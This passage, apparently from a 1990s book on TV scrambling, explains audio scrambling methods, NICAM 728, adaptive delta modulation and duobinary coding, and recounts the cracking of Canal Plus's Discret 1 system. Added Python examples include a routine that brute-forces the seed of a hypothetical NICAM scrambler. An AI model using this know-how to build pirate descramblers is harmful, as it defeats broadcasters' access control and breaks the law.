balanced demodulator. The commonest IC used for this application is the 
MC1496. The only variations between hacker decoder designs for this type 
of audio scrambling lies in the carrier generation. 


Some designs use the 4060 as the oscillator and divider on a single chip. 
Others use a separate chip for the oscillator, typically a 4069, and a 
separate divider. Of the two the 4060 is the more elegant solution. 


Spread Spectrum Inversion 


This form of audio scrambling is based on the spectrum inversion process. 
It uses a number of carrier frequencies and as such it can be difficult to 
hack if all the frequencies are unknown. 


Most of the scrambling systems using this type of audio scrambling use one 
or more crystals to derive the carrier frequency. The descrambler itself 
derives the video interference carrier from one of the crystal frequencies. 
The audio inversion frequency is linked to the particular carrier frequency in 
use at the time. In the SAVE system, the carrier frequency is generally one 
sixth that of the video interference carrier. 


Band Inversion And Rotation 


Band spectrum inversion is where the audio spectrum is filtered into 
different bands and these bands are then inverted or rotated. This is a more 
secure method than any of the previous ones. It is also more complex and 
requires a more complex descrambler. 


Ideally the audio in each band would be compressed before processing. 
This system is used in some audio scramblers for use on telephone 
systems. It is more difficult to hack. The main disadvantage is that the 
scrambled audio is still discernible in some band rotation combinations. 


Spectrum Shift Scrambling 


With Spectrum Shift, the audio spectrum is shifted upwards in frequency. 
On paper it looks simple. In practical terms it is more complex than 
Spectrum Inversion. 
Single Frequency Shift 


This is the type of audio scrambling system that was used on the now 
defunct BBC version of SAVE. To scramble the audio, the complete 
spectrum is shifted up in frequency by about 1 KHz. To descramble the 
signal, the scrambled spectrum is shifted back down by 1 KHz. This is 
generally achieved by Sideband modulation techniques. 


The subject is dealt with in detail in the October 1991 issue of Elektor 
Electronics. A full circuit diagram and PCB layout are given in the article. 


Strangely when the article was published, very few people recognised it for 
what it was. Considering the BBC’s legalistic antics when Elektor published 
the SAVE circuit, this may have been a good thing. Of course it does go 
some way towards the stereotype of the technologically clueless lawyer. 


Multiple Frequency Shift 


The use of a single shift is not a very secure option. As a result this form of 
scrambling is more commonly used with a cycling shift. The shift frequency 
can be derived from a number of crystals or a synthesizer. 


Digital Audio 


It is rare for a Digital Audio system to be hacked from a hardware point of 
view. The only case of this happening was FilmNet's ill-fated digital audio 
System. It is commonplace for the access control element of a digital audio 
system to be hacked. 


The architecture of most digital audio systems is simple. Of course the 
simplicity of architecture belies its security. The audio signal is digitised and 
then it is EXORed with the output of a Pseudo Random Binary Sequence 
Generator. This PRBSG is reseeded every few seconds with a new starting 
point. In this manner the output of the PRBSG seems to be random. The 
reseeding data is the key and this is normally the thing that is heavily 
protected with the cryptographical algorithms. 


This is of course a very simplified model but it is also the easiest to 
implement in terms of hardware. The PRBSG can be constructed as part of 
an ASIC and the digital audio decoder circuitry can be constructed from off 
the shelf components. 
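The simple architecture just described, as an added example (not the book's or any real decoder's code): PCM samples are EXORed with the output of a PRBS generator that is restarted from fresh key material at intervals. The 16-bit LFSR used as the PRBSG, the 14-bit sample width and the reseed interval (counted in samples here rather than seconds) are assumptions. The `keystream` function shows why the reseeding data is what has to be protected: anyone holding the seeds, or a clone of the generator, recovers the audio.

```python
# The simple digital audio scrambler described above: PCM samples are XORed
# with the output of a Pseudo Random Binary Sequence Generator that is reseeded
# at intervals with key material.  Added example, not the book's or any real
# decoder's code.  The 16-bit LFSR used as the PRBSG, the 14-bit samples and the
# reseed interval (in samples rather than seconds) are assumptions.

SAMPLE_BITS = 14
RESEED_EVERY = 64        # assumption: samples per reseed period


class PRBSGenerator:
    """16-bit Fibonacci LFSR, taps 16,14,13,11 (a maximal-length polynomial)."""

    def __init__(self, seed):
        if not 0 < seed < (1 << 16):
            raise ValueError("seed must be a non-zero 16-bit value")
        self.state = seed

    def next_bit(self):
        bit = (self.state ^ (self.state >> 2) ^ (self.state >> 3) ^ (self.state >> 5)) & 1
        self.state = (self.state >> 1) | (bit << 15)
        return bit

    def next_word(self, bits=SAMPLE_BITS):
        word = 0
        for _ in range(bits):
            word = (word << 1) | self.next_bit()
        return word


def lfsr_period(seed=1):
    """Steps until the LFSR state repeats (65535 for a maximal 16-bit LFSR)."""
    gen = PRBSGenerator(seed)
    steps = 0
    while True:
        gen.next_bit()
        steps += 1
        if gen.state == seed:
            return steps


def keystream(seeds, n_samples):
    """One 14-bit word per sample.  Every RESEED_EVERY samples the generator is
    restarted from the next seed; the seeds are the key that the text says the
    cryptographic algorithms actually protect."""
    words = []
    gen = None
    for i in range(n_samples):
        if i % RESEED_EVERY == 0:
            gen = PRBSGenerator(seeds[(i // RESEED_EVERY) % len(seeds)])
        words.append(gen.next_word())
    return words


def scramble(samples, seeds):
    """XOR each sample with the keystream; the same call descrambles."""
    mask = (1 << SAMPLE_BITS) - 1
    return [(s & mask) ^ k for s, k in zip(samples, keystream(seeds, len(samples)))]


descramble = scramble
```

If the seed list never changes, the keystream repeats from one reseed period to the next, which is the frozen-architecture problem the text returns to further down: the generator itself is fixed hardware, so all the security rests on the seeds being fresh and kept out of reach.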


More commonly, the structure that the FilmNet system used is employed. 
Conventional circuitry is used to demodulate the data into a serial 
datastream. This datastream is then fed to a custom ASIC which processes 
it and then decrypts it. The decrypted data is then fed to a digital to 
analogue converter. The use of an ASIC allows the designers more leeway 
in the choices of crypto systems. While the EXORed PRBSG is one of the 
simplest methods, other more complex algorithms can be incorporated into 
the design. 


Perhaps the more complex solution of using a complete crypto system such 
as DES to process blocks of digitised audio is not a good one. The 
decryption process would have to be fast enough not to affect the 
synchronisation of the soundtrack and video. Of course it would be possible 
to adjust the audio so that it is slightly ahead of the video. The inherent 
delays in encryption and decryption processes would bring the soundtrack 
and the video back into synch. 


There is one system using the DES to encrypt their digitised audio; 
Videocipher II. This system was hacked due to a flaw in the hardware 
implementation. The audio crypto system was not hacked. Though it is safe 
to say that VideoCipher would not have survived in Europe. It is simply too 
old in terms of technology to be a viable system for the nineties. 


Both Orion and Videocipher use pulse coded modulation, (PCM), to digitise 
their audio. One technique is the reverse transmission of digitised blocks of 
audio information. This type of transmission is secure enough to defeat the 
casual hacker but will soon fall victim to the dedicated hacker. The key to 
the descrambling lies in identifying the beginning and end of each block. 


The digital audio will be encoded according to a recognised data standard. 
Developing and testing a new data transmission standard for the sake of 
one scrambling system is rarely economical unless the design team has an 
extremely large budget. 


The commonest combination in digital audio scrambling is a well 
established data transmission format such as Phase Shift Keying, (PSK), and a 
customised crypto system. In this respect the first stage of the hack would 
be the easiest. The encrypted data would have to be extracted from the 
signal. The second step would be the hacking of the crypto system. 


It is common practice to test the digital audio transmission format with clear 
data. This sometimes causes JAFAs to believe that they have hacked the 
system while in reality, the system has not been implemented. 


There are many types of digital audio format. In this section we shall only 
deal with two; Adaptive Delta Modulation and NICAM. These systems are 
currently in use in Europe. Adaptive Delta Modulation is used on the 
Scientific Atlanta B-MAC system and NICAM is used terrestrially. Though 
as yet NICAM has not been used as a form of scrambling. 
NICAM 728 


NICAM stands for Near Instantaneously Companded Audio Multiplex. The 
analogue audio signal is digitised and is compressed when in digital format. 
The digital information can then be transmitted in a multiplex format so that 
mono channels or a stereo channel can be transmitted in the one frame. At 
the receiving end, the signal is then digitally expanded and converted back 
to analogue. There are two basic reasons for companding the audio. The 
first is the reduction of bits required, the second reason is the improved 
signal to noise ratio in the received audio. 


The analogue audio is sampled at a rate of 32 KHz. This is just over twice 
the maximum audio frequency of 15 KHz. There are 14 bits in the initial 
audio sample. This 14 bit binary word is digitally compressed to 10 bits. 


The NICAM system was developed by the BBC in the seventies. The UK 
version is often referred to as NICAM 728. The number 728 refers to the 
transmitted bit rate of 728 Kilobits per second. One 728 bit frame is 
transmitted every millisecond. The breakdown of the bit rate is shown 
below. 


8 bits     Frame Alignment Word       8 Kbit/s 

5 bits     Control Information        5 Kbit/s 

11 bits    Additional Data           11 Kbit/s 

704 bits   Sound, Parity or Data    704 Kbit/s 
Total:                              728 Kbit/s 


The first step in the compression procedure is to separate the digital 
samples into blocks of thirty two samples each. 


The second step is to code the 14 bit binary samples using a 10 bit 2s 
Complement code to an accuracy defined by the magnitude of the largest 
sample word in the block. 


The 2s Complement code is an alternative way of representing a number 
using ones and zeroes. One bit in the number represents whether the 
number is positive or negative. This is its sign. The rest of the bits represent 
the magnitude of the number. This type of representation is called "Signed 
Number Representation". In this system, positive numbers are represented 
as simple unsigned binary. There is no change. For a negative number, the 
situation is different. The binary number to be converted is inverted on a bit 
by bit basis. A 1 will become a 0 and vice versa. Then 1 is added to it. The 
most significant bit, MSB, of a negative 2s complement number will be 1. 
The following example will make it clearer. 
[Chart: The NICAM Compression Chart, showing which four bits of the 14 bit 
2s Complement word are omitted in each coding range.] 


The 14 bit sample is converted to 2s Complement format and then is 
processed according to the chart shown above. Four bits out of each 14 bit 
wide 2s Complement word are omitted from the final 10 bit word. The actual 
format of a Mono NICAM Frame can be seen in the diagram on page 4-9. 
Example: 


To express -7 in 2s Complement, invert 0111 (+7 = 0111). This gives 1000. 
Add 1, which gives the final value of 1001. Therefore in 2s Complement code 
-7 = 1001. 


In the third step a Scale Factor is then generated. The Scale Factor tells the 
receiver which degree of compression is used. The scale factor word is 
three bits wide. 


The Coding Range is defined by the Scale Factor. There are five coding 
ranges. These are relative to a maximum amplitude of 1. 


Range 1: 1 to 0.5 
Range 2: 0.5 to 0.25 
Range 3: 0.25 to 0.125 
Range 4: 0.125 to 0.0625 
Range 5: 0.0625 to 0 


As can be seen from the compression chart, if the block of samples is in 
coding range 1, the four least significant bits are discarded. For range 2, 
the three least significant bits are discarded as is the second most 
significant bit; with every sample in the block below half of full scale, 
that bit merely repeats the sign bit and carries no information. The same 
rule runs down the ranges: in range 3 the two least significant bits and the 
two bits below the sign bit go, and in range 5 only the four redundant bits 
below the sign bit are dropped, so the quietest blocks keep their full 
resolution. In each case, the number of bits in the sample is always 10. In 
this way, the 14 bit samples are first coded into 2s Complement and then 
into a 10 bit compressed sample. 


A further level of information is provided for the receiver by the protection 
range. This is also related to the Scale Factor. The relationship is shown in 
the table below. 


Coding Range    Protection Range    Scale Factor (r1 r2 r3) 

     1                 1                 1 1 1 
     2                 2                 1 1 0 
     3                 3                 1 0 1 
     4                 4                 0 1 1 
     5                 5                 1 0 0 
     5                 6                 0 1 0 
     5                 7                 0 0 1 
     5                 7                 0 0 0 


A parity bit is added to each sample. This is produced by checking the six 
most significant bits. 
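The companding steps above, worked through as an added Python example; this 
is not the book's own code nor any decoder's firmware. It carries the coding 
range number rather than the three bit scale factor code (the assignment of 
codes is in the scale factor table above), assumes that the sign bit plus the 
nine bits below the redundant sign extension bits are the ten kept, and uses 
even parity over the six most significant bits. The sample blocks are 
constructed. 

```python
# NICAM-style near-instantaneous companding of one 32-sample block.
# Added illustration, not the book's code. Follows the steps in the text:
# 14-bit 2s Complement samples -> coding range from the largest magnitude
# -> 10-bit words -> parity bit over the six most significant bits.
# The 3-bit scale factor code sent on air is assigned from the scale
# factor table in the text; this example carries the coding range number.

BLOCK = 32
SAMPLE_BITS = 14
FULL_SCALE = 1 << (SAMPLE_BITS - 1)     # 8192 counts == amplitude 1.0


def twos_complement(value, bits):
    """Bit pattern of a signed integer in `bits`-wide 2s Complement
    (the text's example: -7 in four bits is 1001)."""
    assert -(1 << (bits - 1)) <= value < (1 << (bits - 1))
    return value & ((1 << bits) - 1)


def coding_range(samples):
    """Range 1 covers peaks from 1.0 down to 0.5 of full scale, range 2
    0.5 to 0.25, ... range 5 everything below 0.0625."""
    peak = max(abs(s) for s in samples)
    for r in range(1, 5):
        if peak >= FULL_SCALE >> r:         # 4096, 2048, 1024, 512 counts
            return r
    return 5


def compress_sample(value, rng):
    """Keep the sign bit and the nine bits below the (rng - 1) bits that
    merely repeat the sign; the remaining (5 - rng) LSBs are dropped."""
    shift = 5 - rng
    pattern = twos_complement(value, SAMPLE_BITS)
    sign = pattern >> (SAMPLE_BITS - 1)
    return (sign << 9) | ((pattern >> shift) & 0x1FF)   # 10-bit word


def expand_sample(word, rng):
    """Receiver: read the 10-bit word as 2s Complement and undo the shift."""
    value = word - 1024 if word & 0x200 else word
    return value << (5 - rng)


def parity_bit(word):
    """Even parity over the six most significant bits of the 10-bit word."""
    return bin(word >> 4).count("1") & 1


def compress_block(samples):
    """Return (coding range, 32 eleven-bit words: 10 sample bits + parity)."""
    assert len(samples) == BLOCK
    rng = coding_range(samples)
    words = []
    for s in samples:
        w = compress_sample(s, rng)
        words.append((w << 1) | parity_bit(w))
    return rng, words


def expand_block(rng, words):
    """Check every parity bit, then expand the words back to 14-bit samples."""
    out = []
    for packed in words:
        w, p = packed >> 1, packed & 1
        if parity_bit(w) != p:
            raise ValueError("parity error in sample word")
        out.append(expand_sample(w, rng))
    return out


if __name__ == "__main__":
    loud = [4096] + [3] * 31                    # one loud sample forces range 1
    rng, words = compress_block(loud)
    print(rng, expand_block(rng, words)[:2])    # the quiet samples lose 4 LSBs
```

The first call in the demonstration shows the cost of the scheme: a single 
loud sample drags the whole block into range 1, and the quiet samples around 
it lose their four least significant bits. 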
The sound and parity bits in the NICAM frame only comprise 704 bits of the 
728. The other bits are taken up by the Frame Alignment Word, 8 bits; the 
Control Information, 5 bits; Additional Data, 11 bits. 


The Frame Alignment word is an eight bit word, 01001110, that is 
transmitted at the start of every frame. Its function is to synchronise the 
receiver with the datastream. 


The control information is transmitted as a five bit block. The first bit, c0 is 
the frame flag bit. It is high for the first eight frames and low for the next 
eight. The next three bits, c1, c2, c3 identify the application of the contents 
of the sound block. The correct term for them is the application control bits. 
Bit c3 is used to indicate the need for further processing by the receiver. It is 
this bit that would be used to switch in the decryption circuitry in the 
receiver. If the bit is high and the receiver does not have the necessary 
decryption circuitry, then the audio output will be switched off. The fifth bit c4 
is the reserve audio switching flag. This bit is high when the FM subcarrier is 
carrying the same channel as the NICAM. 


Application Control Bits Table 

c1 c2 c3    Data Contents Of Sound Blocks 
0  0  0     Stereo signal. Alternate samples. 
0  1  0     Two Mono channels, M1 and M2, alternate frames. 
1  0  0     One Mono audio, one data channel, alternate frames. 
1  1  0     One 704 bit data channel. 
There are eleven additional data bits. The function of these bits has not 
been defined. It would be easy to use them as a service identifier or for 
transmitting other data. 


The modulation format used to transmit NICAM, terrestrially, is Differentially 
Encoded Quadrature Phase Shift Keying or DQPSK for short. This is a 
rather elegant modulation system in that it reduces the bandwidth required 
to transmit the data. Each phase change represents a bit pair or two bits of 
data. The following diagram shows the rest state of the carrier phase. The 
rest states are ninety degrees apart. The carrier phase remains in one of 
the rest states until a bit pair causes it to change phase by the 
predetermined amount. The phase change caused by each bit pair is shown 
in the table. 
Carrier Rest States (diagram): four rest states, ninety degrees apart. 


Bit Pair - Phase Change Table 

Bit Pair (A B)    Phase Change In Degrees 
0 0                  0 
0 1                -90 
1 0               -270 
1 1               -180 


With the carrier in rest state 1, a bit pair of 10 will cause a phase change of 
-270 Degrees. This would put the carrier phase in rest state 4. Applying a 
further bit pair of 11, would cause a phase shift by -180 Degrees to rest 
state 2. Applying a further bit pair of 01 would cause a phase shift of -90 
Degrees to rest state 3. Strangely, the negative shift is clockwise. 


The modulation format is clear and unambiguous. A bit pair can always be 
recovered by comparing the present phase of the carrier with the immedi- 
ately previous phase. 


Before the 728 bit frame is converted to bit pairs, the datastream is 
scrambled for spectrum shaping purposes. This is carried out to ensure that 
the data looks like noise and so causes minimum interference to the video 
or other audio carriers. A pseudo random sequence generator is EXORed 
with the data stream. The PRSG is a nine stage type. The initialisation word 
is 111111111. The Frame Alignment Word is not scrambled. The first bit 
that is scrambled is the bit immediately after the Frame Alignment Word and 
the last bit that is scrambled is the bit immediately before the FAW. The 
descrambling of the frame must be carried out at the receiver before the 
multiplex is split up. 


Since the information is in digital format, it is easy to encrypt. The simplest 
method is to encrypt the Frame Alignment Word, FAW. This would ensure 
that a NICAM decoder that didn't have a valid FAW couldn't lock up the 
frame. The NICAM digital signal is EXORed with a PRSG bitstream for 
spectrum shaping purposes. This PRSG has a fixed seed. If a variable seed is 
used, a simple though efficient encryption system could be effected. The 
keys for the encryption system could be held in the descramblers or 
transmitted in the unassigned bits in the NICAM signal. The catch is the 
key space: a nine stage generator has only 511 non-zero seeds, so a pirate 
decoder can try every one of them against a single frame and keep the seed 
whose parity bits all check, and because the generator is linear, nine 
consecutive bits of known plaintext, such as predictable control bits, give 
the seed outright. 
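An added Python example (not the book's code) of the frame scrambler and of 
why a variable seed on it is a weak key. Assumed, because the page does not 
give them: the generator polynomial x^9 + x^4 + 1 from the published NICAM 
728 specification, re-initialisation at every frame, and a frame laid out as 
described above (FAW, five control bits, eleven additional bits, sixty-four 
eleven bit sound words) without NICAM's bit interleaving. The secret seed 
and the sound data are constructed. 

```python
# Frame scrambling in NICAM 728 and the weakness of using its seed as a key.
# Added illustration, not the book's code. Assumptions: the nine-stage
# generator uses the polynomial x^9 + x^4 + 1 given in the published NICAM
# specification and is re-initialised at every frame; the frame is laid out
# as the text describes (FAW, 5 control bits, 11 additional bits, 64 x 11-bit
# sound words) without the bit interleaving NICAM applies on top.

FAW = [0, 1, 0, 0, 1, 1, 1, 0]          # sent in clear; 0x4E
FRAME_BITS = 728
HEADER = len(FAW) + 5 + 11              # bits before the first sound word
FIXED_SEED = 0b111111111                # the standard initialisation word


def prsg(seed, n):
    """n bits from a nine-stage Fibonacci LFSR, x^9 + x^4 + 1, started from `seed`.
    The first nine output bits are the seed bits themselves (LSB first)."""
    state, out = seed & 0x1FF, []
    for _ in range(n):
        out.append(state & 1)
        new = (state ^ (state >> 4)) & 1
        state = (state >> 1) | (new << 8)
    return out


def with_parity(sample10):
    """11-bit sound word: 10-bit sample followed by even parity over its six MSBs."""
    return (sample10 << 1) | (bin(sample10 >> 4).count("1") & 1)


def parity_ok(word11):
    return (bin(word11 >> 5).count("1") + (word11 & 1)) % 2 == 0


def build_frame(control, additional, sound_words):
    assert len(control) == 5 and len(additional) == 11 and len(sound_words) == 64
    bits = FAW + control + additional
    for w in sound_words:
        bits += [(w >> i) & 1 for i in range(10, -1, -1)]
    assert len(bits) == FRAME_BITS
    return bits


def scramble(frame, seed=FIXED_SEED):
    """XOR everything after the FAW with the generator output. The FAW is left
    clear so the receiver can lock; running it again with the same seed descrambles."""
    keystream = prsg(seed, FRAME_BITS - len(FAW))
    return frame[:len(FAW)] + [b ^ k for b, k in zip(frame[len(FAW):], keystream)]


def sound_words(frame):
    body = frame[HEADER:]
    return [int("".join(map(str, body[i:i + 11])), 2) for i in range(0, 704, 11)]


def parity_failures(frame):
    return sum(not parity_ok(w) for w in sound_words(frame))


def recover_seed_by_parity(scrambled):
    """Pirate decoder with no key: try all 511 non-zero seeds and keep those
    that leave every one of the 64 parity checks intact."""
    return [s for s in range(1, 512) if parity_failures(scramble(scrambled, s)) == 0]


def recover_seed_from_known_bits(scrambled, known_after_faw):
    """With nine known plaintext bits right after the FAW, the keystream and
    hence the seed fall out of the XOR with no search at all."""
    ks = [c ^ p for c, p in zip(scrambled[len(FAW):], known_after_faw)][:9]
    return sum(bit << i for i, bit in enumerate(ks))


if __name__ == "__main__":
    frame = build_frame([1, 0, 0, 0, 1], [0] * 11,
                        [with_parity((i * 37) & 0x3FF) for i in range(64)])
    secret = 0b101100111
    on_air = scramble(frame, secret)
    print(recover_seed_by_parity(on_air),
          recover_seed_from_known_bits(on_air, [1, 0, 0, 0, 1] + [0] * 11))
```

The parity search needs nothing but the frame itself; the known plaintext 
shortcut needs only the control and additional data bits, which the text 
notes are predictable or undefined. Other tap positions change nothing about 
either attack. 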


The NICAM format could easily be adapted to a satellite television 
application. The first and most obvious modification to the standard is the 
carrier frequency. The carrier frequency for NICAM 728 as used in the UK is 
6.552 MHz. This frequency is obtained by multiplying the transmitted bit rate 
of 728 Kilobits per second by 9. By multiplying the bit rate by 10, a carrier 
frequency of 7.28 MHz would be obtained. The bandwidth of the NICAM 
carrier on the UK terrestrial system is 700 KHz. The beauty of this 
modification is that the only necessary changes to a normal NICAM 
demodulator are the carrier crystal frequency and the input bandpass filter. 


Adaptive Delta Modulation 


The Adaptive Delta Modulation format was developed by the Dolby 
Laboratories. It is used on the Scientific Atlanta B-MAC system. This 
system is currently employed on the AFRTS and the SIS Racing channel. 


Delta is used in mathematics to indicate change. In a delta modulation 
system, the delta refers to the direction of the change. The delta would be 
positive or negative. There is a disadvantage associated with ordinary delta 
modulation systems. When the amplitude of the audio signal changes by an 
amount greater than the quantizing step size, (the minimum voltage change 
required to effect a one bit change in the digital output of the analogue to 
digital converter), an overload occurs. Adaptive delta modulation overcomes 
this problem by using a variable step size and a variable pre-emphasis. 


At the encoder, the audio input is continually monitored so that the best step 
size and pre-emphasis can be selected. The adaptive delta modulation 
produces a bitstream of between 200 and 300 Kbit/s. The step size and 
pre-emphasis data are transmitted at a lower bit rate. This makes the 
design of a decoder simpler. 


The slower bit rates of the step size and pre-emphasis data allows them to 
be filtered out with simple low pass filters. As can be seen in the simplified 
adaptive delta modulation decoder, the decoding process is straightforward. 
The digital audio data is fed into a flip flop. This flip flop is clocked by the 
audio clock. The output of the flip flop is either 1 or 0. The output is fed to a 
multiplier. The multiplier is an analogue circuit that is used to form the 
product of two voltages. The multiplication factor is set by the step size data. 
The output of the multiplier is fed to a leaky integrator. The output of the 
multiplier is essentially a set of discrete voltage points. The leaky integrator 
joins these points to give a smoother signal. The output of the leaky 
integrator is then fed to the variable de-emphasis circuit. The resultant audio 
is then amplified and fed to the modulator or audio output. 
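An added Python illustration of delta modulation with and without adaptation; 
it is not Dolby's design and not the NE5240. The step size is chosen per block 
of 32 bits by the encoder and sent alongside the audio bits, standing in for 
the lower rate step size data described above; the variable pre-emphasis is 
omitted, and the test signal, block length and leak factor are assumed. It 
shows the slope overload of the fixed step coder on a loud tone and how the 
adaptive step removes it. 

```python
# Delta modulation with and without adaptation. Added illustration, not
# Dolby's or Scientific Atlanta's design: the step size is chosen per block
# by the encoder and sent as side information at 1/32 of the audio bit rate,
# standing in for the lower-rate step size data the text describes. The
# variable pre-emphasis is left out. Decoder structure follows the text:
# flip-flop -> multiplier (step size) -> leaky integrator.
import math

BLOCK = 32      # audio bits per step-size value
LEAK = 0.99     # leaky integrator coefficient


def block_steps(signal, minimum=0.005, margin=1.25):
    """Encoder monitoring: one step per block, sized to the steepest slope in it."""
    steps = []
    for start in range(0, len(signal), BLOCK):
        blk = signal[max(start - 1, 0):start + BLOCK]
        slope = max((abs(b - a) for a, b in zip(blk, blk[1:])), default=0.0)
        steps.append(max(minimum, margin * slope))
    return steps


def decode(bits, steps):
    """Receiver: each bit becomes +step or -step and is leakily integrated."""
    est, out = 0.0, []
    for i, b in enumerate(bits):
        step = steps[i // BLOCK]
        est = LEAK * est + (step if b else -step)
        out.append(est)
    return out


def encode(signal, steps):
    """Delta modulator: 1 if the input is above the decoder's reconstruction,
    else 0. The loop tracks the same reconstruction the receiver will build."""
    est, bits = 0.0, []
    for i, x in enumerate(signal):
        b = 1 if x > est else 0
        bits.append(b)
        step = steps[i // BLOCK]
        est = LEAK * est + (step if b else -step)
    return bits


def rms_error(signal, recon):
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(signal, recon)) / len(signal))


def compare(n=512, period=64, amplitude=0.8, fixed_step=0.01):
    """RMS error of fixed-step DM (slope overload) versus block-adaptive DM
    on a loud tone. Returns (fixed, adaptive)."""
    tone = [amplitude * math.sin(2 * math.pi * i / period) for i in range(n)]
    nblocks = (n + BLOCK - 1) // BLOCK
    fixed = [fixed_step] * nblocks
    adaptive = block_steps(tone)
    err_fixed = rms_error(tone, decode(encode(tone, fixed), fixed))
    err_adaptive = rms_error(tone, decode(encode(tone, adaptive), adaptive))
    return err_fixed, err_adaptive


if __name__ == "__main__":
    print("fixed %.3f adaptive %.3f" % compare())
```

With a step of 0.01 the fixed coder can climb only 0.01 per sample and never 
reaches the peaks of the tone; the adaptive coder sizes each block's step to 
the slope it has to follow and is left with granular noise of about one step. 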


An adaptive delta modulation decoder is available in chip format as the 
NE5240. This is a stereo decoder and is used in the B-MAC descramblers 
manufactured by Scientific Atlanta. In these descramblers the digital audio 
must first be decrypted before being converted from adaptive delta 
modulation format. The encryption system used in the B-MAC system is a 
variant of the Data Encryption Standard. It is also more secure than the 
DES. Nobody has commercially hacked the audio on this system. Instead 
they hacked the access control software. 


Duobinary Encoding 


The Duobinary encoding system is a relatively simple method of encoding 
data. It allows for the even simpler design of the decoder. It is used in the 
D-MAC and D2-MAC systems. It is a baseband system that conveys data 
by the level of a three level waveform. This analogue-like appearance 
means that it can be frequency modulated for satellite television transmission 
along with the rest of the MAC signal. The disadvantage of the 
C-MAC system was that it required the video section of the line to be 
frequency modulated and the data section to be 2-4 PSK modulated. This 
meant that two demodulators were required and the encoding circuitry was 
over-complicated. 


In this section we are concerned with digital audio. D-MAC and D2-MAC are 
covered in detail in Chapter 7. In D-MAC there are 209 data bits in each 
line's sound and data packet. In D2-MAC there are 105 bits in each line's 
packet. 


A duobinary encoder can best be considered in three stages. The overall 
process is a combination of digital and audio techniques. 


The first step is to pre-code the bitstream. The bitstream is inverted. Each 
bit in the bitstream is then EXORed with the bit immediately previous. The 
new bitstream is then fed to a level shifter. This produces a +1 and -1 
bitstream. 


The second stage of the encoder is the encoding section proper. The 
pre-coded bitstream is subjected to a one bit delay and added to itself 
linearly. The resultant signal is amplitude limited so that it cannot exceed the 
maximum video level. 


The third stage is the low pass filtering. This is essential if the bitstream is 
not to produce harmonics. The other reason for the low pass filtering is to 
reduce the bandwidth required for the D2-MAC sound and data packet to 
approximately 5.026 MHz. In the D-MAC system, the filter limits the D-MAC 
sound and data packet's bandwidth to approximately 10.5 MHz. 
The top waveform, A, is the actual duobinary encoded signal. It is a tristate 
signal. The comparators in the decoder diagram slice the duobinary signal at 
the upper and lower levels. 


The levels of the duobinary encoded signal are +0V4, 0V and -0V4. Logic 1 
is represented by +0V4 and -0V4. Logic 0 is represented by 0V. 


The operation of the duobinary decoder is extremely simple. In theory, it 
consists of two comparators, an EXOR gate and an inverter gate. The 
duobinary signal is fed to the two comparators. One comparator slices the 
signal at the upper level. The second comparator slices the signal at the 
lower slicing level. The outputs of the comparators are fed to the EXOR 
gate. The output of the EXOR gate is inverted by the inverter gate and the 
original bitstream is restored. 


The data slicer is generally on the integrated circuit rather than being 
discrete circuitry. 
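The three stages of the encoder and the comparator decoder, as an added 
Python example; this is not the MAC chipset's circuitry. Low pass filtering 
and amplitude limiting are left out, the precoder memory and the delay 
element are assumed to start from the logic 0 (-1) state, and the bit 
pattern is constructed. 

```python
# Duobinary precoder, encoder and decoder as described in the text. Added
# illustration, not the MAC chipset's circuitry. Levels follow the text
# (+0V4 and -0V4 carry a logic 1, 0V a logic 0); the low pass filtering and
# amplitude limiting are left out, and both the precoder's memory and the
# encoder's delay element are assumed to start from the "-1" state.

LEVEL = 0.4          # volts
SLICE = LEVEL / 2    # comparator thresholds at +0.2 V and -0.2 V


def precode(bits):
    """Stage 1: invert each bit, XOR it with the previous precoded bit,
    then level shift 0/1 to -1/+1."""
    prev, out = 0, []
    for b in bits:
        prev = (b ^ 1) ^ prev
        out.append(+1 if prev else -1)
    return out


def encode(bits):
    """Stage 2: add each precoded symbol to its one-bit-delayed copy.
    The sum is -2, 0 or +2, scaled to the three line levels."""
    prev, out = -1, []                  # delay element starts in the -1 state
    for s in precode(bits):
        out.append((s + prev) * (LEVEL / 2))
        prev = s
    return out


def comparator(v, threshold):
    return 1 if v > threshold else 0


def decode(levels):
    """Decoder: one comparator slicing at +0.2 V, one at -0.2 V, an EXOR gate
    and an inverter. No memory, so an error in one symbol stays in one bit."""
    out = []
    for v in levels:
        upper = comparator(v, +SLICE)
        lower = comparator(v, -SLICE)
        out.append((upper ^ lower) ^ 1)
    return out


if __name__ == "__main__":
    data = [1, 0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0]
    line = encode(data)
    print(line)                 # +0.4/-0.4 wherever data has a 1, 0.0 for a 0
    print(decode(line) == data)
```

The inversion in the precoder is what makes a logic 1 come out as the two 
outer levels and a logic 0 as the middle one, matching the slicer, and the 
precoding is why a corrupted symbol on the line corrupts one bit rather than 
every bit after it. 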
Case Study: The RITC Discret 1 System 


Video Scrambling: Video Line Delay. 


The video information in each line is delayed by one of three delays; 0, 902 
nS or 1804 nS. These delays are applied on a pseudo random basis so that 
the scrambled video takes on a ragged form. 


Audio Scrambling: Spectrum Inversion. 


The audio is spectrum inverted around a 12.8 KHz carrier. This carrier 
frequency is derived from the system clock in the official descrambler. 


Users: Canal Plus France (switching to Syster), MMDS/Cable. 


In November 1984, Canal Plus started transmission using the Discret 1 
scrambling system. The system was unwisely proclaimed as being hacker-
proof. At first glance, there was good reason to believe in its security. The 
official descrambler used custom integrated circuits and was microprocessor 
controlled. Individual descramblers could be turned on or off by the 
headend. So what went wrong? 


In the December 1984 issue of the French "Radio Plans" magazine, there 
was an article on how to construct a pirate descrambler for Canal Plus. 
Naturally the people at Canal Plus were not pleased. They took legal action 
against the magazine and were successful. The magazine was seized by 
the court. It was decided that the "Radio Plans" design did not infringe the 
patent but it was an incitement to theft. Enough photocopies of the article 
were circulated so that anybody who wanted them could get them. The 
problem was compounded by the fact that a Paris newspaper published the 
article. Things are now very different in France. Piracy is a serious offence. 
Of course while this has limited the problem, it has not eliminated it. 


The Discret system existed before Canal Plus decided to use it. It was 
primarily used for the TV5 links to Tunisia. When it was being used for that 
application, there was very little piracy because there were very few pirates 
with the necessary satellite reception equipment. The Canal Plus situation 
involved the use of terrestrial transmitters and as such the signal was widely 
available. 


The Discret system is a dual facility system. It scrambles the video and the 
audio. Most of the systems before Discret affected the synch pulses and 
sometimes the audio. The Discret system actually processed the video. It is 
primarily a baseband scrambling system. The RF signal has to be 
demodulated and turned into composite video and audio before it can be 
descrambled. 
The RITC Discret 1 System 

The advent of the SCART or Peritel socket ensured that the hookup of the 
descramblers would be efficient. Under French law all colour televisions had 
to have a SCART socket. Two types were manufactured; an RF type and a 
